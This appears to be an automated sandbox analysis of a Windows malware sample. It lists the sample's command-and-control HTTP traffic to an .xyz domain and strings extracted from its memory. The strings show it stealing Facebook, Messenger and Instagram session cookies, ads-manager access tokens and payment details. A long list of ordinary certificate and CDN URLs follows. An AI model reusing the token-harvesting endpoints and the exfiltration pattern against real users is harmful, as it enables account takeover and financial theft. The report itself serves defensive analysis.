Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: POST /info_old/w HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Content-Type: application/x-www-form-urlencoded | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Content-Length: 81 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/r HTTP/1.1 | Cache-Control: no-cache | Connection: Keep-Alive | Pragma: no-cache | Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 | Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7 | User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.193 Safari/537.36 | upgrade-insecure-requests: 1 | Host: c8dd8ae6dc4dc644.xyz
Source: global traffic | HTTP traffic detected: GET /info_old/ddd HTTP/1.1 | Host: C8DD8AE6DC4DC644.xyz | Accept: */*
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: "name":"fb_dtsg","value":"name="fb_dtsg" value="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps://www.facebook.com/""2%d0https://graph.facebook.com/me/friends?access_token=%s&pretty=1&limit=1summarytotal_count{}summarytotal_count%dquery_friends.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: count = %d equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: -3https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1errorSummaryconfirmemail.phpcard_type_name-110query_payment2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: ret = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: _time":"13245951499607797","lastpingday":"13245947458072931","location":1,"manifest":{"app":{"launch":{"container":"tab","web_url":"http://www.youtube.com"},"web_content":{"enabled":true,"origin":"http://www.youtube.com"}},"current_locale":"en","default_locale equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originreferer: https://www.messenger.com/origin: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie: c_user=ookie: xs=ookie: ;%[^;]; https://m.facebook.com/settings/email/<span class="_52ji _8uk3">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>@&#064;@&#064;https://m.facebook.com/settings/sms/<strong><span dir="ltr">accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1</span></span>+ https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_point"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9sec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: noneupgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_name/"draftID":Accept: */*Origin: https://m.facebook.comReferer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Requested-With: XMLHttpRequestX-Response-Format: JSONStreampage_name=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=3&__user=,"https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7D"dtsg":{"token":"accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Referer: https://m.facebook.com/pages/creation_flow/?step=name&cat_ref_page_id=0&ref_type=launch_pointsec-fetch-dest: documentsec-fetch-mode: navigatesec-fetch-site: same-originSec-Fetch-User: ?1upgrade-insecure-requests: 1"https://m.facebook.com/pages/create/edit_category/"pageID":Referer: https://m.facebook.com/pages/creation_flow/?step=category&draft_id=&cat_ref_page_id=0&extra_data=%7B%22page_name%22%3A%22%22%7DAccept: */*Origin: https://m.facebook.comSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originX-Response-Format: JSONStreamX-Requested-With: XMLHttpRequestpage_category=1300&draft_id=&m_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__user=}"+ .-_@@friends2page.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: pageid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: bad allocationSOFTWARE\Mozilla\Mozilla FirefoxCurrentVersion\\MainInstall Directory%s\firefox.exe{}[]"1""2""3"123bad allocationc_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adssettings/?act=&access_token:""access_token":""query_token_account_id.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/ads/manager/account_settingsaccountID:"access_token:"Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: none""query_token_account_id_laomaozi.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: c_user=xs=https://www.facebook.com/adsmanager/manage/adshttps://business.facebook.com/adsmanager/manage/adswindow.location.replace("")/act___accessToken="Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: nonehttps:act=/\/"%[0-9]query_token_account_id2.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: account_id = %s token =%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://www.youtube.com equals www.youtube.com (Youtube)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/"name="fb_dtsg" value=""logout_hash":"""logout_hash":"logoutToken:""logoutToken:"https://www.facebook.com/comet/try/source=SETTINGS_MENU&nctr[_mod]=pagelet_bluebar&__user=&__a=1&__csr=&__req=14&__beoa=0&__pc=PHASED%3ADEFAULT&dpr=1&__ccg=EXCELLENT&fb_dtsg=&jazoest=for (;;);{https://m.facebook.com/logout.php?h=%s&t=%sc_user=deleted"encrypted":"https://m.facebook.com/?_rdr""name="fb_dtsg" value="logout.phpm_sess=&fb_dtsg=&jazoest=&__csr=&__req=9&__a=&__user=https://m.facebook.com/bookmarks/flyout/body/?id=u_0_6\https://m.facebook.com/logout.php%sc_user=deletedhttps://m.facebook.com/?soft=bookmarks"logoutURL":"\"logout.phphttps://m.facebook.com&source=mtouch_logout_button&persist_locale=1&button_name=logout&button_location=settings%s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/ads/manager/account_settings equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/adsmanager/manage/ads equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/bookmarks/pages?ref_type=logout_gear equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/comet/try/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: https://www.facebook.com/connect/ping?client_id=124024574287414&domain=www.instagram.com&origin=1&redirect_uri=https%3A%2F%2Fstaticxx.facebook.com%2Fconnect%2Fxd_arbiter%2Fr%2F1e2RywyANNe.js%3Fversion%3D42%23cb%3Df19f2d8a0dd2f24%26domain%3Dwww.instagram.com%26origin%3Dhttps%253A%252F%252Fwww.instagram.com%252Ff2dc055ae1b1274%26relation%3Dparent&response_type=token%2Csigned_request%2Ccode&sdk=joey&version=v2.2&access_token=&expires_in=Location: query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: token = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopes equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesLocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/dialog/oauth?client_id=124024574287414&redirect_uri=https%3A%2F%2Fwww.instagram.com%2Faccounts%2Fsignup%2F&state=%7B%22fbLoginKey%22%3A%221l3a6gcoxzmx9bogry41n78unr193ooptzd1bmk8ggfxw5bdph1%22%2C%22fbLoginReturnURL%22%3A%22%2F%22%7D&scope=email&response_type=code%2Cgranted_scopesocation: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/login/async_sso/messenger_dot_com/?__a=1x-auth-result: query_mess_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: x_auth_result = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/payments/settings/payment_methods/index.php?__a=1 equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri= equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.facebook.com/x/oauth/status?client_id=124024574287414&input_token&origin=1&redirect_uri=origin: https://www.instagram.comsec-fetch-mode: corsreferer: https://www.instagram.com/sec-fetch-site: cross-sitefb-ar: equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/ equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20191224.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmpString found in binary or memory: x-csrftoken: xhttps://www.instagram.com/accounts/login/ajax/facebook/"userId": "sessionid="";sessionid=;query_instagram_cookie_20200229.\task_cookie\facebook_agreement.cpp[HIJACK][%s][%s][%d]: sessionid = %s equals www.facebook.com (Facebook)
Source: unknown | DNS traffic detected: queries for: c8dd8ae6dc4dc644.xyz
Source: unknown | HTTP traffic detected: POST //fine/send HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3Accept-Language: ko-KR,ko;q=0.9,en-US;q=0.8,en;q=0.7User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36upgrade-insecure-requests: 1Content-Length: 84Host: c8dd8ae6dc4dc644.xyz
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/ddd
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364182783.0000000003EF0000.00000004.00000001.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/r
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.365302511.00000000006E9000.00000004.00000020.sdmp | String found in binary or memory: http://C8DD8AE6DC4DC644.xyz:80/info_old/w
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364144645.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.e
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertECCSecureServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceCodeSigningCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2HighAssuranceServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2SecureServerCA.crt0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSecureSiteECCCA-1.crt0
Source: 63C4F3D9EA0CC861.exe, 63C4F3D9EA0CC861.exe, 00000004.00000003.262789067.0000000003F2E000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crx
Source: 63C4F3D9EA0CC861.exe, 00000004.00000003.262093125.0000000003F27000.00000004.00000001.sdmp | String found in binary or memory: http://clients2.google.com/service/update2/crxx
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODOCodeSigningCA2.crl0r
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: 1612045890161.exe.3.dr | String found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTS1O1core.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/GTSGIAG3.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl.pki.goog/gsr2/gsr2.crl0?
Source: MiniThunderPlatform.exe.3.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0O
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertSecureSiteECCCA-1.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/sha2-ha-cs-g1.crl00
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/sha2-ha-server-g6.crl04
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-ecc-g1.crl0.
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl3.digicert.com/ssca-sha2-g6.crl0/
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0=
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertSecureSiteECCCA-1.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: 63C4F3D9EA0CC861.exe, 00000003.00000002.368837459.000000000354C000.00000004.00000001.sdmp, 63C4F3D9EA0CC861.exe, 00000004.00000002.275225860.000000000344C000.00000004.00000001.sdmp | String found in binary or memory: http://crl4.digicert.com/sha2-ha-cs-g1.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/sha2-ha-server-g6.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-ecc-g1.crl0L
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g6.crl0L
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://docs.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.364210797.000000000394C000.00000004.00000040.sdmp | String found in binary or memory: http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe
Source: 63C4F3D9EA0CC861.exe | String found in binary or memory: http://drive.google.com/
Source: 63C4F3D9EA0CC861.exe, 00000003.00000003.284546923.0000000003F0F000.00000004.00000001.sdmp | String found in binary or memory: http://forms.real.com/real/realone/download.html?type=rpsp_us
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyuliQ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzjSw3?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB16g6qc?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17milU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB18T33l?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19x3nX?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xCDZ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xGDT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xMWp?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xaUu?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xssM?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19xzm6?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yF6n?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yFoT?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yuvA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB19yxVU?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB7hjL?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
Source: ecvB803.tmp.11.dr | String found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBO5Geh?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
